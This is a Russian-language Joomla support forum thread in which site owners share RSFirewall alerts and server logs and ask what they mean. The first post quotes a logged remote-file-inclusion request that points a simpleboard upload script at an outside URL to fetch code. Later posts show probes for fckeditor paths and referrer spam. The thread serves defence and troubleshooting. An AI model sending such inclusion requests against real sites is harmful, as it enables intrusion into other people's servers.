Форум русской поддержки Joomla!® CMS
07.12.2016, 14:36:10 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

RSFirewall. Вопрос по дальнейшим действиям

 (Прочитано 654 раз)
0 Пользователей и 1 Гость смотрят эту тему.
kik84
Живу я здесь
******

Репутация: +59/-4
Offline Offline

Сообщений: 1307



« : 26.08.2014, 15:48:21 »

Установлен RSFirewall. Пришло предупреждение, что сначала с 46.38.63.68, а потом с моего IP было несколько попыток отправить такой запрос: домен/components/com_simpleboard/file_upload.php?sbp=http://gold-live.ru/file.php

RS автоматически заблокировал этот IP, следовательно сайт для меня перестал открываться) Через БД удалил свой IP и возник вопрос, что мне дальше делать: как понять куда копать, чтобы найти источник этого запроса.
На сайте com_simpleboard не установлен.
Записан
fathernet
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 21


« Ответ #1 : 05.06.2015, 21:08:47 »

Подскажите пожалуйстаззззззз
1
Сайт: http://www.site.ru/
Страница: http://www.site.ru/js/fckeditor/editor/
Запрос: Нет запроса
Описание: Обнаружен пустой пользовательский агент.
Уровень тревоги: низкий
Дата события: 2015-06-05 14:12:36
IP адреса: 43.249.81.65
2
Сайт: http://www.site.ru/
Страница: http://www.site.ru/common/fckeditor/editor/
Запрос: Нет запроса
Описание: Обнаружен пустой пользовательский агент.
Уровень тревоги: низкий
Дата события: 2015-06-05 14:12:35
IP адреса: 43.249.81.65
ID пользователя: 0

1и 2 пробивают видимо на наличие модулей ок.

3
Сайт: http://site.ru/
Страница: http://site.ru/uslugi/
Запрос: http://laxdrills.com/
Описание: IP заблокирован по гео-признаку.
Уровень тревоги: низкий
Дата события: 2015-06-05 13:21:49
IP адреса: 94.153.10.249

4
Сайт: http://site.ru/
Страница: http://site.ru/uslugi/
Запрос: http://elmifarhangi.com/
Описание: IP заблокирован по гео-признаку.
Уровень тревоги: низкий
Дата события: 2015-06-05 13:21:48
IP адреса: 94.153.10.249

5
Сайт: http://site.ru/
Страница: http://site.ru/uslugi/
Запрос: http://laxdrills.com/
Описание: IP заблокирован по гео-признаку.
Уровень тревоги: низкий
Дата события: 2015-06-05 13:21:46
IP адреса: 94.153.10.249

3,4,5 - это что такое ? по 20-40 сообщений по утру и по 10-15 днем
Записан
kik84
Живу я здесь
******

Репутация: +59/-4
Offline Offline

Сообщений: 1307



« Ответ #2 : 06.06.2015, 13:15:37 »

Ну есть же возможность блокировки по странам, это и есть 3,4,5.
Записан
fathernet
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 21


« Ответ #3 : 07.06.2015, 10:50:11 »

меня интересует ЗАПРОС ...
Запрос: http://elmifarhangi.com/
Запрос: http://elmifarhangi.com/

Это что такое?
Записан
fathernet
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 21


« Ответ #4 : 08.06.2015, 09:39:11 »

логи у хостера такие

94.153.10.249 - - [07/Jun/2015:09:07:09 +0300] "GET /uslugi/ HTTP/1.0" 403 770 "http://shoidia.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
94.153.10.249 - - [07/Jun/2015:09:07:10 +0300] "GET /uslugi/ HTTP/1.0" 403 770 "http://sdy-rala.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
94.153.10.249 - - [07/Jun/2015:09:07:11 +0300] "GET /uslugi/ HTTP/1.0" 403 770 "http://sdy-rala.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
94.153.10.249 - - [07/Jun/2015:09:07:10 +0300] "GET /uslugi/ HTTP/1.0" 403 770 "http://shoidia.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
94.153.10.249 - - [07/Jun/2015:09:07:11 +0300] "GET /uslugi/ HTTP/1.0" 403 770 "http://shoidia.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
94.153.10.249 - - [07/Jun/2015:09:07:11 +0300] "GET /uslugi/ HTTP/1.0" 403 770 "http://sdy-rala.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
Записан
kik84
Живу я здесь
******

Репутация: +59/-4
Offline Offline

Сообщений: 1307



« Ответ #5 : 08.06.2015, 09:44:49 »

Вот насчет этого - хз
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet